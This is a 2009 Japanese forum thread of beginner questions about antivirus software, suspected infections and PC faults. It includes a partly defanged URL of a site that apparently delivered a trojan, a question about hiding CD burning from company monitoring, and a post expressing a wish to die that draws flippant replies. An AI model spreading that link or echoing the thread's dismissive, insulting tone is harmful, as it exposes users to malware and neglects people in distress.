http://pc11.2ch.net/test/read.cgi/sec/1247244615/318 318 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/15(水) 19:12:59
【使用OS】『VistaHP』
【PCスペック】『PentiumDC E2200 2,2GHz』
【使用ブラウザ】『Firefox3,5』
【Microsoft Updateの更新の状態】『自動更新は停止状態』
【セキュリティソフトと年式】『ウイルスバスター30日体験版』
【具体的な症状】『3〜6秒重くなる』
【過程と措置】Safariを使ってみたら上記のような症状はなし
どうすればいいですか?
(ο^д^)ノシ
(´・ω・`)ショボーン
専スレあるけど、ウィルスクリアは優秀なほう? みなさんはどう思われます?
>>363 普通。並。ベター。
別に使えないわけじゃないが、優秀とは思わない。
時々オンラインスキャンして(脳豚やカスペ、Fセキュなど)万が一検出があれば
乗り換えを検討すると良い。
365 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 23:08:20
質問です。 私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。 せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。 昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます こういう現象はウイルスのせいでしょうか? 僕はどうしたらいいでしょうか? よろしくお願いします。
フォーマットしてリカバリーしてください。
367 :
365 :2009/07/15(水) 23:15:24
>>366 ありがとうございます。
フォーマットとは何でしょう?
ぐぐったのですが意味がわかりません。
リカバリはわかりますが・・・
またハチ公か!!!!!!!!!!!!!!!!!!!!!!
>>367 PC使っててフォーマットしたこと無いの?
なんというゆとり…
ウィルスって感染してすぐ症状出るの? 最初気付かなくてじわりじわり来るウィルスってあるの?
371 :
365 :2009/07/15(水) 23:36:50
>>369 それが無いんです。
よろしくご教授お願いします。
┌○┐ │お|ハ,,ハ マルチは激しく │断|゚ω゚ ) お断りします │り _| // └○┘ (⌒) し⌒
今日システムの復元したんだけど、その後見たら復元ポイントが全部無くなってた。 復元ポイントを消すようなウィルスってある?
>370 すぐ症状が現れる場合もあるし、全然現れない場合もあります。 前者はワンクリウェアやアドウェアなど、新しい窓を出す奴 後者はボットやルートキットなどの、ユーザーに気付かれずに活動するもの あと、特定の時刻になると発病するマルウェアもある。
>>375 いっぱいあるんだね
気付かれないで活動って、例えばどんな症状?
379 :
365 :2009/07/16(木) 00:10:21
マルチではないです。
多分
>>372-373 あたりの自演といったところでしょう
困ったものです
あっちは無視してこちらでお願いします
> 365:名無しさん@お腹いっぱい。:2009/07/15(水) 23:08:20 > 74 :名無しさん@お腹いっぱい。:2009/07/15(水) 23:09:22
そういえば
>>76 の脆弱性はMS09-032(kb973346)で対応したんだね。
>>365 お金がかかるかもしれないけど
PC専門店で、持込みPCの診断・駆除してくれるところがあるから診てもらったら?
もしOS再インストール(リカバリ)を薦められたら代行作業もしてくれると思うよ
>>365 に対しては、おとなしくPCリカバリしろ以外の解決策はないと思うぜ。
∧_∧ ry ´・ω・`ヽっ `! i まいったなあ・・・ ゝ c_c_,.ノ
>>382 そうみたいですね。
他にもゼロデイがあったようだが、それも修正されたみたいだね。
φ(^_ゞ^)ノシ
ノートン 2009とカスペルスキー 2009 どっちを買うかで悩んでいるのですが、性能や軽さなどの面を考慮すると どちらを買うべきでしょうか? あとカスペルスキーは初心者には扱いにくいというのは本当ですか?
>389 さあ? そんなものに頼る必要ないからな、俺の場合… >390 φ(゚_ゝ゚)ノシ
ハチ公(U^ω^)わんわんお!
もっぁぁぁ・・・ (´ε` )
( ^ω^)
>>388 わたしならその2択でノートンを選ぶことはないね。新種への対応が致命的に遅すぎる。
>あとカスペルスキーは初心者には扱いにくいというのは本当ですか?
人それぞれ。
カスペのオンラインスキャンでフルスキャンしたら、2時間かかった 普通にこんなもん? 常駐のセキュリティソフトのフルスキャンは、1時間かからない
GDATAを選んどけば間違いなし
いやあ、Gは初心者さんには辛かろう……
400 :
名無しさん@お腹いっぱい。 :2009/07/17(金) 15:33:36
トロイの仕込んであるURLを踏んでしまいました すぐに閉じたせいかノートン先生に反応がありません 今スキャンしていますがスキャン後何も検出されなければ大丈夫と考えていいのでしょうか?
反応しなかったのはノートン先生がまだ対応していない新種のトロイだから 今スキャンしても何も検出されない
403 :
400 :2009/07/17(金) 20:19:23
>>401-402 ありがとうございます
一応報告はしておきました
今のところ不具合は何も見つかっていないのですが
トロイに感染しているかどうかはどうすれば調べられるのでしょうか?
新種ということでスキャンにも引っかからないとすればどうすればいいのか
教えていただきたいです
残念ながら未知のトロイに対して「○○なら感染している」と判断できるものはない。 あればセキュリティソフトがとっくに対処してるわけで・・・ ProcessExplorer等で怪しいプロセスの監視、 netstat -anoで通信しているプロセスがないか監視、 ルータでHTTP等をブロックして監視等するしかない。 それで何もないからって、感染していないとは誰も保証はできない。 少しでも不安があるならリカバリするのが確実。
>>404 そうなんですか
プロセスやポートを調べてみましたが不審なものはなかったように思います
一応キャッシュも削除しておきました
なにか問題が起こればまた報告します
参考までに、以下のサイトでした
h t t p://www.gomenifty.com/Blog/
VBS:Obfuscated-gen [Trj]
NOD32の期限がもうすぐ切れるので、乗り換えを考えています。 何かオススメはありますか?
>>408 脅威が3つも……
ありがとうございます
今のところPCに不具合はありません
ちなみに、セキュアブレイン gred 無反応でしたw
>409 そのサイト、Iframeタグで脆弱性を突くサイトを読み込ませる仕組みになってるぽいな。 アドレス削ってトップページに行くと中華のようなサイトが表示された。 安心しろ! 過去の脆弱性を突くタイプだから、WindowsUpdateしてれば感染しないから。
>>412 去年の末あたりから止めてました……
今のところまだ大丈夫です
ちなみにaguseだと ソースチェッカーオンラインによる迷惑メール送信サイトブラックリスト 民間企業Finjanによるマルウェアを含むサイトのブラックリスト の二つがCAUTIONだった。 IPアドレスは61.139.126.91 ネットワーク名 CHINANET-SC 中国か…
ベクターでGdataというアンチウイルスの安売りをしているのですが 3台PC用に1年間のライセンスというのは 1年使える更新キーが3つつくということでしょうか つまり一台で使うならバージョンアップを考えなければ3年使えるのでしょうか それともインストール先が1台だろうと2台だろうと1年で使えなくなるのでしょうか
質問です。 CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
>>417 キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
853 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/18(土) 01:13:40 質問です。 CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
会社がそういう対策とってるならな
402 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/18(土) 01:21:41 質問です。 CD-R等にデータを焼くと、何時何分何秒に何MByteのデータを焼いたということが セキュリティソフトによって会社にばれるようなことはあるのでしょうか?
┌○┐ │お|ハ,,ハ マルチポスト │断|゚ω゚ ) お断りします │り _| // └○┘ (⌒) し⌒
ハチ公(U^ω^)わんわんお!
( ´-`).。oO(本家のQ&Aに載っている事や、マルチの上会社の目を気にする質問 にマジレスする回答者がいると思ってカキコする者達って何を考えているのだろう)
また八公が懲りずにリンク張るだけの糞バイスしてんのか
ハチ公(U^ω^)わんわんお!
バカの一つ覚えとはこの事だなw
>>407 NOD32→ESS PFWついてウマー
軽さを求めるなら、NOD32から他への乗り換えは、AntiVir位しか勧められないが、英語になるので、
初心者さんにはお勧めできない。
PCスペックがそれなりにあるなら、カスペあたりにしとくと幸せになれます。
八頭推奨のノートンはやめときましょう。
中国のIPブロックの仕方おしえてくれませんか
どもども
質問なんですが今kasperskyのセキュリティー使ってるんだけど、 来月に期限が切れるので乗り換えようと思います。 乗り換えを考えてるソフトはnortonのセキュリティー、norton360、ソースのzeroのです。 私はITエンジニアクラスのスキルはありませんので、乗り換えるとしたらどれがお奨めでしょう? osはwindowsvistasp2でスペックはかなり良いほうだと思います。
>>416 知らないなら答えなければいいのに
とりあえず誰でもいいから見下す相手が欲しくてこのスレにいるのね?
>>416 みたいなゴミにレスして本題を忘れていたw
>>415 可能だよ
でもG-DATAは検出率は高いけど
他のセキュリティソフトと比べても重いソフトなので
C2D以上くらいのCPUを積んでないと作業に支障が出ると思うよ
推奨スペック確認してみて
携帯から失礼します。友人に進められてウイルスバスター2009を購入したのですが、 ウイルスバスター2009は以前流行ったGENOを防いでくれるのでしょうか? 友人いわく大丈夫だそうですが…
半分くらいはブロックするかもしれないけど100%は無理 バスターは検出率が低いから半分行かないかも
440 :
437 :2009/07/18(土) 18:34:11
>>438 そうですか…
素直にノートン先生あたりにすれば良かったのでしょうか…
>>440 ノートン、GDATA、カスペあたりならOK
フリーのavastでもGenoはブロックする
そんな話じゃねえだろ バスターで防げるかってことで
答えは防げる というか無いんだから防ぐも何もない
ここでも中国人が糞バスター薦めて暴れてんのかw
回答ありがとうございます。バスターでなんとか頑張ります。
相変わらず中国人の情報操作は酷いなw
誰か>434に答えんかい
またkasperskyを使え。
どれもお奨めじゃない
(ο^д^)ノシ
456 :
ネット初心者 :2009/07/19(日) 00:44:53
ユーザ-----インターネット----ルータ----Fire Wall----L2スイッチ----Webサーバ | | | 監視装置 上の図において、ファイアウォールの設定が 「インターネット側からはWebサーバ(ポート80)へのパケットしか通さない。」 「プライベート側からは全て通す」 とした場合、監視装置からルータへのPing監視は出来ますか? Ping打っても返ってこれないと思うんですが。。。
ょぅι゙ょ 禁止!
>>434 どう見ても乗り換えないほうが幸せです。カスペを更新しましょう。
ノートン:最新のマルウェアへの対応が遅い
ZERO:防御力零と揶揄される位にすり抜けが多い。投げ捨て対象。
あとSP2のまま使うな、SP3まできちんとWindowsUpdateあてろ。セキュリティソフト入れても他のとこに穴残してどうする。
SP3って無理だろw
460 :
名無しさん@お腹いっぱい。 :2009/07/19(日) 01:52:13
勘違いしてるね
俺からも
>434
どう見てもカスペを使い続ける方が無難だと思いますね。
>>458 ちゃんとvistaって書いてありますよ。
>osはwindowsvistasp2で
って
おっと、失敬、VistaとXPを読み間違えてた。目が疲れてるようだから寝るわ。
GENOの対策ならまずはFlashPlayerの更新が先かと
(ο^д^)ノシ
465 :
名無しさん@お腹いっぱい。 :2009/07/19(日) 17:00:00
生きててもつらいし、後悔ばかりでなんのために生まれてきたのか・・ いっそ死んでしまえばすっきりするかと思ったりするんですが みなさんは何のために生きてるんですか? 死にたいとか思ったりしませんか?
すいません スレ違いですね
俺はお金がほしい 毎月貯金額が増えていくのが楽しい
470 :
名無しさん@お腹いっぱい。 :2009/07/19(日) 23:14:27
ウイルスバスターをインストールしました これに併せて入れておくべきフリーのソフトウェアを教えてください 前はSPYBOTとADAWREを入れてました。
>>470 それ以前にWindowsファイヤーウォールとwindows defenderを無効にしましたか?
Windowsファイヤーウォールは無効でいいけどWindows defenderは有効でいいんじゃない?
475 :
470 :2009/07/19(日) 23:57:35
>>472 >>474 それはどうしてでしょうか?
両方あれば二重に強力ということではないのですか?
ルーターもつないでますがそれもはずすべきなのでしょうか?
>>473 すみません。略称ではわからないので正式名お願いします。
479 :
470 :2009/07/20(月) 00:10:40
>>471 レスが遅れてすみません。
どのスレでしょうか?
あまり慣れてないので教えていただけると助かります。
>>476 ありがとうございます。
>>477 すみません。文意がよく飲み込めません。
セキュリティをやるのを止めるとはどういうことですか?
480 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 01:31:35
winnyをよくやってるんですが、winnyみたいに日本でしか使われていないソフトに発生する ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか? winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか? アホみたいな質問で済みません・・。
>>480 悪いことは言わん
嫌な思いをしたくないのなら二度とこのスレ見ないほうがいいぞ
>>478 リンク先踏んでもウイルスはない。
たしかウィルスクリアってバスターのOEMだったよね。
今年にはいってバスターは生協とかgoogleキャッシュとかブロックしなかったっけ?
高いのは設定ではなくRegistry Winnerの価格かと。あくまで個人の感覚だけどね。
レジストリクリーナの一年間ライセンス$34.95…
>>480 ダウソ板から出てこないでください。むしろ、カエレ。(門前払い)
485 :
480 :2009/07/20(月) 01:51:52
すいません、よそでききます。
【使用OS】 『WindowsVista sp2』
【PCスペック】 『CPU: 3.00GHz 、メモリ: 2MB』
【使用ブラウザ】 『Firefox 3』
【Microsoft Updateの更新の状態】 『自動更新設定、最新の状態』
【セキュリティソフトと年式】 『Norton Internet Security2009』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】
ブラウザがFirefoxで『NoScript』というものを使っています。
こちらのサイト(通販のサイトです)
ttp://www.littlegarden.co.jp/ で買い物をしたいのですが、商品をカートに入れようとすると(入れると)
「クロスサイトスクリプティングの可能性があるアクセスを遮断しました」という注意が出ます。
こちらのサイトでは買い物をしない方が良いのでしょうか?
注意を無視するとどうなってしまうのでしょうか?
買い物をしても良い場合、気をつけないといけない事はありますでしょうか?
どうぞ宜しくお願いします。
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど ルータのバグかなんかかな ノートンでスキャンしても何もないって出るし でも気持ち悪い
定番の無料のファイアーウォールとアンチウイルスソフトの組み合わせ教えていただけませんか? よろしくお願いします
>>486 >商品をカートに入れようとすると(入れると)
>「クロスサイトスクリプティングの可能性があるアクセスを遮断しました」という注意が出ます。
『NoScript』のせいで、通販サイトの買い物カゴがうまくいかないんでしょう
>買い物をしても良い場合、気をつけないといけない事はありますでしょうか?
信頼性のあるメーカーサイト以外は捨てメルアドでのやりとりが無難かな
ナニ人かも判らないような個人商店やオークションは情報の保障とかないでしょ
>>491 役に立たない回答する位なら出てくるな。
493 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 10:40:26
ウィルス対策ソフトって何個くらい入れればいいんですか?
>>493 って言うか、一般的な総合セキュリティーソフト1個で全然十分です。
495 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 11:15:23
質問です。 win2000sp4ディスクで内蔵ハードディスクをフォーマットしてOSをインストールして、 IE6sp1をダウンロードしてインストールしたあと再起動をして、Lhaplusという解凍ソフトをダウンロードしてexeを実行したとき、 プログラム開始エラー(プログラムのファイルに異常が発見されたため、実行を中断します。)が生じました。 また、オンラインスキャンを行おうとしたところ、正常にスキャンができませんでした。 この場合、HDがクリーンになったにもかかわらず、ウィルスが存在していることを意味しているように思われます。 その場合、どこにウィルスが存在する可能性があるかわかりますか? また、対策などあるのでしょうか?
どこに:割れOSのCD-ROM 対策:割らない
割れ(コピー)じゃなくて正規のディスクですよ。 CMOSの短絡をしようかと思っていますが、ほかに感染経路の可能性があれば教えてください。
セーフモードでちゃんとメモリも検査したか?
>>496 ウイルス感染よりシステムエラーを疑うべきかと
OSあるいはIE6sp1のインスコミスでシステムファイルがぶっ壊れてるか
>>499 さんの言うようにハードウェアの異常(HDDやメモリ)かな
ウイルスだとしたら相当深いレベルで感染してるし
感染源も解決方法もわかるとは思えないから
結局クリーンインスコするはめになると思うよ
>また、対策などあるのでしょうか?
ウイルスが怖いならオフラインで一通りのセットアップは済ませること
個人的にはそんな神経質になる必要は無いと思うけどね
ノートン アンチウィルス2009 ゲームエディションっていうの買って入れて みたのですが、これはアプリ毎の通信の遮断はできないんですね。 これを入れたまたアプリ毎に通信の遮断を掛けたい場合は、どんな ソフトを入れればいいのでしょうか?
502 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 14:38:42
【使用OS】 ウィンドウズXP 【PCスペック】 『CPU: 1GHz 、メモリ:16 MB』 (「システムのプロパティ」参照) 【使用ブラウザ】 IE7 【Microsoft Updateの更新の状態】 自動更新設定 【セキュリティソフトと年式】 シマンテックエンドポイントプロテクション 2009 【その他スパイウェア対策ソフト】 なし 【回線の種類・ルータの有無】 LAN 【具体的な症状】 ウイルスソフトのシマンテックエンドポイントプロテクション というものがパソコンに入っております。 これがあまりに頻繁に動くのでスキャンとアップデートの頻度を変えようと 思い、設定変更からスキャンを6日23時間に一回、アップデートを毎週に かえようとしています。 しかし、ひとたび再起動すると自動的にスキャンが1時間に一回、 アップデートが一日一回かつ失敗時には一時間に一回再試行に設定変更されます。 これはわずらわしいので、設定を保存する方法、またはシマンテックを 軽く使う方法があれば教えてください。よろしくお願いします。
メモリ16MB?
504 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 14:47:42
はい ノートパソコンなので
ウィンドウズXP動くの
506 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 14:53:56
もしかしたら数字は違っていたかもしれません ただXPは動くし、ユーチューブも見られます
16Mwwwねえよwww
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど ルータのバグかなんかかな ノートンでスキャンしても何もないって出るし でも気持ち悪い
16MBじゃ9x動くかどうかわからねーし! XPだったら120%うごかねえってw >502 >シマンテックエンドポイントプロテクション 企業で使用してるPCでしょうか? そうならシステム管理者を説得するしかないと思いますよ。
510 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 15:13:11
16ギガだったかもしれません(苦笑 システム管理者がそういう設定にしてるってことですかね
>>499 , 500
クリーンインスコを何度やってもPCが落ちてしまいます。
IE6sp1と解凍ソフトのダウンロード程度なので、感染経路がネットワークではないと思われます。
HDDはまっ白のため、メモリかマザーのCMOSが原因かと考えています。
safeモードでのメモリのチェックの具体的な方法がわかりませんが、探してみます。
(時間が経てば勝手に落ちてしまうため、メモリ−が原因な気がします。
ただ今までは正常だったため、マルウェアの所為かと思ってます。
safeモードでは、PCが落ちることはないようです。)
かりにメモリーのエラーが判明した場合、メモリーは全換えなのでしょうかね・・
>16ギガだったかもしれません(苦笑 /::::i::::、:::ヽ、:::\:ヽ:\::ヽ:、:ヽ:、:', 早 駄 /::i|::l::ト、ヽ::、:ヽ:、:::::\::ヽ::l:ヽ:i::i:::! く 目 /:/:!:::!:|::ヽ:\ヽ:::、:\::ヽ:ヽ!:::i::|:::!::! な だ !ハ::|::::i::l:|心、:ヽ::\:ヽ_\、\:ヽ:|!:|:|i. ん i、:!:|:、N{、ヒjヽゝ\ヾイ ヒj >、ヽi:、:|:l: と こ ヽ:!::トヽ ̄ l! ` ` ̄´ |::l::|:|j:,!:! か い ト、::! u j |::/lj:::!リ し つ ヾ、 丶 - u リイ:|リ な : リヽ ‐、ー- 、_ /イ:::i い : rー'"ト:l゙、  ̄ ./ , |::! と : / ヘ ヾ ヽ、 _,. ' / |:'
>511 OSクリーンインストール作業について LANケーブルを抜いてやったか クリーンインストール後、セキュリティソフトをインストールしたか ルータは設置してあるか
>>511 >ただ今までは正常だったため、マルウェアの所為かと思ってます。
どう考えても、マルウェアを疑う要因がありません。セキュリティの問題じゃない。
ここでは取り扱いできませんので、お引き取りください。
ハード的なものと思われる(ただの熱暴走かもしれないが)ので、メーカーに修理に出すなり、
MEMTESTやCHKDSKやPC内の掃除など、自分で原因を追及して問題箇所を直すなりしてくれ。
M/BのCPU付近のコンデンサが膨れてたり液漏れしてたらM/Bがお亡くなりです。
>>502 権限のない奴がいじっても無効です。
企業・法人向けのもののようですので、会社のPCと思われますが、勝手に設定をいじらないように。
あなたの責任問題になりますよ。最悪クビです。
>514 マルウェアが原因だと思いますね。 セキュリティソフトもルーターもない"Windows2000 SP4"では ネットに繋いだだけでもマルウェアに感染してしまいますからね。 しかもXPやVistaみたいに標準のファイアーウォールはありませんから。 >IE6sp1と解凍ソフトのダウンロード程度 であってもネットワーク経由でウイルスに感染する危険性がありますしね。
517 :
名無しさん@お腹いっぱい。 :2009/07/20(月) 16:00:42
502です わかりました 首にならないようにこのままの設定で我慢しようと思います 本当にありがとうございました
個人情報のないパソコンなら不調になればリカバリでたいてい問題ないですかね? メールもしないんですけど
>518 おk
ありがとうございます
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど ルータのバグかなんかかな ノートンでスキャンしても何もないって出るし でも気持ち悪い
感染してるな
横からですが、うちもコンピュータとか開くと、なんか作動してますね。 パフォーマンスモニタのネットワーク欄を見ながら、エクスプローラ起動すると、PID番号が4っていうのが出ます。 タスクマネージャでPID番号4が何か見たら、NT Kernel & System ってなってました。 これも何かウィスル感染してる証拠でしょうか?
文字どおりカーネルが動いてるだけだろ。
>>523 >PID4
極普通のこと。
よって全然問題なし。
526 :
523 :2009/07/20(月) 19:46:57
527 :
470 :2009/07/20(月) 19:49:34
ウイルスバスターを入れたらWindowsのFWとDFを切らなくてはいけないのですか?
タスクマネージャを見ていたところ、rundll32が2つ動いているのを見つけました。 調べてみたらウイルスの可能性もありそうなので 気になってProcessWalker Expressで見てみたんですが プロパティのコマンドラインの部分がそれぞれ rundll32 nView.dll,nViewInitialize "C:\WINDOWS\system32\RUNDLL32.EXE" C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit と表示されていました。 モジュール部分には2つともほぼ同じものが表示されていました。 avast、Ad-aware、spybot、a-squared FreeでCドライブをスキャンしても何も出なかったんですが何か不安で・・・ ウイルスか何かでしょうか?
>>528 NVIDIA nView Desktop Managerでしょ。NVIDIAのグラフィック使ってればインストールされる。
特に困らないなら削除してみては?
うちはウィルス等とは別の理由で削除してる。
530 :
528 :2009/07/20(月) 20:26:34
>>529 迅速な回答ありがとうございます。
確かにグラフィックボードはNVIDIAのものでした。
どちらがNVIDIA nView Desktop Managerのやつなんでしょう?
それとも両方ともなんでしょうか
特に問題なさそうで安心しました。
よろしければ削除している理由も教えていただけませんか?
なぜ怪しいサイトにはウィルスとかが多いっていわれるんでしょうか? 怪しいサイトを見るときはみんな用心するだろうから 効率悪くないですか?
逆だから。
うーん最近では普通のサイトでも入ってくるよ。 鯖が乗っ取られてHTMLに不正コード仕込まれてって… いつも見てる安全なサイトが、いつ配布サイトに豹変するか誰にも予測はできないから。
534 :
名無しさん@お腹いっぱい。 :2009/07/21(火) 11:24:56
【使用OS】 Windows Vista SP2 【PCスペック】 『CPU: 2.6GHz 、メモリ:3GB』 【使用ブラウザ】 IE8 【Microsoft Updateの更新の状態】 自動更新設定 【セキュリティソフトと年式】 ウィルスバスター2009 【その他スパイウェア対策ソフト】 なし 【回線の種類・ルータの有無】 ADSLモデム、有線使用 【具体的な症状】 ウィルスバスターを起動した状態で、インターネットに接続(Web閲覧、パターンファイルの更新)すると 必ず1分程度で接続が切れます。状況的にはモデムにPINGが通らなくなり、ネットワークデバイスの再起動 しなければ回復しません。ウィルスバスターを起動していなければ接続は切れません。 またウィルスバスターの全ての機能を無効にしていても、起動していれば接続が切れます。 トレンドマイクロに問合せ、手順どおり再インストールを行いましたが状況は変わりませんでした。 なお、試しにカスペルスキーをインストールしてみましたが同様の症状が出ました。 何か解決方法があれば教えてください。よろしくお願いします。
今ノートン2009を入れてるのですが、 avastも入れて大丈夫でしょうか? この2つは共存出来ますか?
ダメです。 基本的に出来ません。
IEやファイヤフォックスでネット繋いでると勝手に他の海外のページを開いたりします。これは完全に感染してますよね?? セキュリティソフトは入れてないのですが、ウイルスバスター2009のオンラインチェックでは検出されなかったのですが…
>セキュリティソフトは入れてない 論外
>538 感だけどもしやbigfishgamesやamigos.comなどのサイト? けどセキュリティソフトを入れてないってのはねぇー…
【使用OS】 『XP』 【PCスペック】 CPU:1.29GHz 、メモリ:224MB 【Microsoft Updateの更新の状態】 『自動更新』 今までフレッツに加入していてフレッツのセキュリティ対策に加入してたのですが 最近EO光に替えたので新しいセキュリティ対策ソフトを考えます。 ノートンとカスペルスキーの体験版は試しましたがどれがいいとか正直わかりません。 パソコンに弱いので、設定も難しくなく安全なもので何かオススメを教えて下さい!
543 :
名無しさん@お腹いっぱい。 :2009/07/21(火) 20:57:01
スペックきついな〜
>>543 6〜7年前に買った家族共有のモノなんですがPC音痴で全くいじってません。
買い換えずにスペック上げられるんですかね?
その低スペックのせいかセキュリティソフトも何入れても遅いんですよね…orz
>>544 6〜7年前のPCなら増設メモリは入手可能と思いますので最低でも256M増設を。
増設に自信が持てないなら、お店によっては有料でしょうが増設してくれるとこもありますよ。
ノートン先生って常時っていうか不定期にパケット垂れ流してる? ファイル開くときとかゴミ箱のゴミ削除するときとかもパケット送ってる?
>>542-544 >パソコンに弱いので、設定も難しくなく安全なもので何かオススメを教えて下さい!
難しいこと言いますね。完璧に要求を満たすものはないと思いましょう。
あと、パソコンに弱いのは覚えろということで、免罪符にはなりません。
低スペックのPCという前提では、ESS(NOD32)が一番のお勧めになると思います。
セキュリティをもっと安心できるものにする為には、AntiVirにするともっと幸せになれます。
但し、AntiVirの場合は、設定が簡単とはいかないでしょう。英文を理解できるならAntiVirの方がいいです。
■ESS(NOD32)
非情に軽い/日本語対応/新種への対応遅い/ヒューリスティック弱い/すり抜けは比較的多め
ESSはPFWあり(NOD32はなし)
■AntiVir
非情に軽い/英文のみ/新種への対応早い/ヒューリスティックそれなり/すり抜け少ないが逆に過敏
PFWなし(有料版にはあり)/広告が1日1回大きいのが出る
■KINGSOFT
そこそこ軽い/日本語対応で表現も平易/新種への対応遅い/すり抜けはかなり多い(ので非推奨)
PFWもついている
>>546 ノートンには「接続維持」という機能があります。
ダイヤルアップやイーモバイル回線でない場合(一般的な常時接続環境)だと不要のものですが
それが一定時間ごとに通信を発生させています。
>>542 ですが皆様方、沢山の解答ありがとうございます。
スレ違いの事まで答えて下さって感謝しています!
今はセキュリティ対策ソフトはカスペルスキーの体験版使ってます。
普通にネットしたり動画見たりDVDコピーしたりするぐらいなんですが
評判の良いカスペルスキーかノートンかを購入しておけば無難ですかね?
DVDコピーって違法だろ
>>524 タスクバー(画面下の青い帯)を右クリック>タスクマネージャー>パフォーマンス
>コミット チャージ (KB)の最大値 が244M(249856)を大幅に超えているようなら
メモリ増設したほうが…というより増設しなければ。
547さんの紹介に会ったESSでも今のままではちょっとry
553 :
470 :2009/07/21(火) 22:48:49
誰か527を説明してください
554 :
552 :2009/07/21(火) 22:59:55
windowsXP Version2002 ServicPack3 のPCを使っています。 今使用しているPCは最近修理に出したものです。 修理前に普通にインストールすることができたウイルスバスター2008が、修理後(データを初期化され、今使用している)のPCにはインストールするとこがありません。 このバージョンのwindowsと互換性がありませんと出て、そのご続行を押しインストール自体は始まります。 しかしインストールがはじめり途中で進行が止まり戻ります。 インストール前のウィルスチェックにも問題はありませんでした。
>>555 修理後(データを初期化され、今使用している)のPCにはインストールするとこがありません。
⇒修理後(データを初期化され、今使用している)のPCにはインストールするとこができません。
誤字です、申し訳ない
>>557 この方法を試しましたができませんでした。
修理前はちゃんと出来たのが、修理後には出来なくなった…か 今一度、システムのプロパティを開いて、OSのバージョンを確認してみて。
561 :
557 :2009/07/22(水) 01:14:15
>>555 サポートページのアンインストールツールを使い、バスターのフォルダが残っていないことを確認。
試供版セキュリティソフトがインストールされていた場合は残骸が残っていないか確認
または、アンインストールツールでry
DLしたバスターをインストール。
これでだめなら本家サポート行きなされ。
>>559 ( ´(ェ)`)ノシ
φ(・。・)ノシ
なんか頭がクラクラして来ました
【使用OS】 『XP sp3』 【PCスペック】 『CPU: 3.00GHz 、メモリ: 1.96GB』 【使用ブラウザ】 『IE』 【Microsoft Updateの更新の状態】 『自動更新設定』 【セキュリティソフトと年式】 『ウイルスバスター 2009』 【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』 【回線の種類・ルータの有無】 『光回線でルータ使用』 【具体的な症状】 ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える 気になってカペルスキーオンラインスキャンをしたら C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。 C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても 195.tmpというファイルが見つかりません。 ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと このウィルスは関係がありますか? 駆除するには再セットアップでしょうか?
565 :
564 :2009/07/22(水) 02:13:29
すみません 【使用ブラウザ】 間違えました 【使用ブラウザ】 『Fire fox 3.0.11』です
567 :
564 :2009/07/22(水) 02:34:16
レスありがとうございます 検疫操作とは隔離ファイルの管理であってますでしょうか? 隔離ファイルの管理画面では検出数:0になってます これはもう安全という事なんでしょうか? もう一度検索かけてみようと思います ノートンの方も試してみます
>564はマルチ
569 :
564 :2009/07/22(水) 03:06:07
あの、すみません 別のスレとかで質問はしてないんですが どこかで似た質問がありましたか? ノートンのチェックアップツールでは何も検出されませんでした バスターの方も、もう一度検索してみたんですけど何も出てこないので ウイルスは多分大丈夫なのかと思います Firefoxの方はもうちょっと自分で調べてみようと思います 長々と失礼しました ありがとうございました
572 :
564 :2009/07/22(水) 03:17:56
締めましたけど、すみません >570 いや、それは自分じゃないです… 何でそっちにも貼られてるんだ…orz
>>549 ありがとうございます
わけのわからない送受信はノートン先生だったのですね
でもなぜフォルダを開くたびに送信しやがるのでしょうね
>>573 >でもなぜフォルダを開くたびに送信しやがるのでしょうね
それれは別物。なにがどこと通信してるのか特定してから相談してくれ。エスパーじゃねぇんだ。
>>564 >気になってカペルスキーオンラインスキャンをしたら
>C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
フォルダを見る限りでは、バスターが隔離しているものですので、実害はありません。
>ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
>このウィルスは関係がありますか?
断定はできませんが、検出されたフォルダ名からすると別物ではないでしょうか。
レジストリエディタ等(Spybotのツール[システムスタートアップ]やa-squared HiJackFreeなどの方がわかりやすいかも)で
不審なファイルを開こうとするものが入っていないかチェックしてください。自動実行に登録されているものは、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run もしくは、 RunOnce などに登録されて
いると思います。
7/16にFirefox 3.5.1がリリースされていますので、3.0.11から更新してみるのもよいかもしれません。
>駆除するには再セットアップでしょうか?
知らないうちになにかに感染してしまった場合の対処はそれ以外にありません。
他になにか残っているのか、どんな変更を加えられているのかを特定できませんから
